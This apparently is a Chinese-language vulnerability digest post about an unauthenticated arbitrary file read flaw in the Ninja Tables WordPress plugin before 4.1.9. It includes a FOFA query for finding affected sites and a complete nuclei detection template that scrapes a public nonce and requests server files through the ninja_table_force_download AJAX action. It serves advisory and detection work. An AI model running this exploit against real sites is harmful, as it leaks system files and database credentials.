Ninja Tables Unauthenticated Arbitrary File Read Vulnerability

漏洞信息

漏洞名称: Ninja Tables Unauthenticated Arbitrary File Read Vulnerability

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: Ninja Tables是WordPress的一个插件,用于创建和管理表格数据,广泛应用于需要展示结构化数据的网站中。该插件因其易用性和功能性,在WordPress社区中颇受欢迎。此次发现的漏洞影响版本低于4.1.9的Ninja Tables插件,涉及未授权任意文件读取漏洞。漏洞的根源在于’ninja_table_force_download’ AJAX操作中’url’参数的不当验证,导致攻击者无需认证即可利用此漏洞读取服务器上的敏感文件,如’/etc/passwd’或’/wp-config.php’。这不仅可能导致敏感信息泄露,如数据库凭证,还可能被进一步利用进行更严重的攻击。由于漏洞利用无需认证且可以自动化执行,因此对使用受影响版本插件的网站构成了严重威胁。建议用户立即升级到4.1.9或更高版本以修复此漏洞。

产品厂商: wpxpo

产品名称: Ninja Tables

影响版本: version < 4.1.9

搜索语法: body=”/wp-content/plugins/ninja-tables/“

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c5e6de115fa7f4379b67578952e42652b00e697b/http%2Fvulnerabilities%2Fwordpress%2Fwp-ninja-tables-lfi.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

id: wp-ninja-tables-lfi

info:
  name: Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read
  author: xbow,DhiyaneshDk
  severity: high
  description: |
    The Ninja Tables plugin for WordPress (versions < 4.1.9) is vulnerable to an unauthenticated arbitrary file download vulnerability. The issue exists due to the improper validation of the 'url' parameter in the 'ninja_table_force_download' AJAX action.
  impact: |
    An unauthenticated attacker can download sensitive files from the server, such as '/etc/passwd' or '/wp-config.php', potentially exposing sensitive information including database credentials.
  remediation: |
    Update the Ninja Tables plugin to version 4.1.9 or later.
  reference:
    - https://xbow.com/blog/xbow-ninja-tables/
    - https://ninjatables.com/docs/change-log/#521-date-july-9-2025
  metadata:
    verified: true
    max-request: 2
    vendor: wpxpo
    product: ninja-tables
    fofa-query: body="/wp-content/plugins/ninja-tables/"
  tags: ninja-tables,file-download,wordpress,unauth,lfi,wp-plugin

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, "ninja_table")
        internal: true

    extractors:
      - type: regex
        name: public_nonce
        part: body
        group: 1
        regex:
          - '"ninja_table_public_nonce":"([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/os-release&ninja_table_public_nonce={{public_nonce}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, "application/octet-stream")
          - status_code == 200
          - contains(body, "PRETTY_NAME=")
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Ninja Tables Unauthenticated Arbitrary File Read Vulnerability
http://example.com/2025/07/15/github_1623175955/
作者
lianccc
发布于
2025年7月15日
许可协议